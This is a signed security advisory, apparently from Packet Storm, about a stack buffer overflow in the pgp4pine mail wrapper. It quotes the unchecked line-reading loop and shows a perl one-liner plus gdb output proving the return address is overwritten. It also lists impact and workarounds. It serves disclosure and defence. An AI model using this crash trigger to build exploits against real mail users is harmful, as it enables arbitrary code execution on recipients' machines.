pgp4pine version 1.76 (and possibly below) has a vulnerability to a buffer overflow which allows specially crafted emails the ability to execute arbitrary code on the recipient box when the mail is opened.
71f06463fa52e6c0388b62f1896bae3144178d1a34f4c2fae304885745ea9fc8-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Following informations:
I Background:
pgp4pine is a mail encryption/decryption/signature/verification wrapper
to gpg for pine, it is called from pine to parse mail body and get PGP
information from the file.
more information : http://pgp4pine.flatline.de/
II Problem description:
When installed/configured within pine, pgp4pine parse any incoming mail
before reading (in the default standard configuration) looking for
PGP tokens & informations to do his sender's signature verifications.
To verify incoming mail it calls :
menus.c: void fileVerifyDecryptMenu(char *inFile,char *outFile);
and read each line according to this loop :
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h:#define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
fertig=0;
while (!fertig)
{
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
else if ((readline[i++]=c) == '\n')
{
readline[i]='\0';
fertig=1;
}
}
fertig=0;
if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
{
/* got signed message */
fclose(fin);
while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
fertig=1;
}
else if (strncmp("-----BEGIN PGP",readline,14)==0)
{
/* got another type of PGP message (encrypted, keys ...) */
fclose(fin);
fileDecrypt(inFile,outFile);
waitForReturn();
fertig=1;
}
else
i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
If a single line go over 256 chars directly to EOF,
it will overwrite saved environnement on the stack and return,
since there is no check on the index 'i' within the readline[] array,
[...]
}
else if ((readline[i++]=c) == '\n')
{
[...]
you can can go over CONSOLE_IO_LINE_LENGTH and replace necessary
saved registers before hiting one condition to return.
[...]
if ((c=getc(fin))==EOF)
{
outFile=inFile; /* this usually is not
executed, EOF breaks directly */
return;
}
[...]
then try:
rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Here it is ;)
III Impact
Since pgp4pine process any incoming email, sending special crafted email
can make sender execute arbitrary code on the recipient box when the
mail is opened.
IV Workaround/Solutions
Deactivate pgp4pine and use another pgp wrapper for pine :
http://pgpenvelope.sourceforge.net/
http://www.megaloman.com/~hany/software/pinepgp/stable.html
or any other...
author holger@flatline.de has been contacted since 01/2003
no reply since :/
V Proof of concept
Attached proof of concept code, for any informations read the source.
Best Regards,
- ---
Eric AUGE.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (FreeBSD)
iD8DBQE+b1fGL/U5psk9l1gRAr1RAJ4pnFriwS073R3fEcGp+1nMF4Q58gCfdLAK
3aY03iuZQPfonSiyaqa5/Co=
=zirR
-----END PGP SIGNATURE-----
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed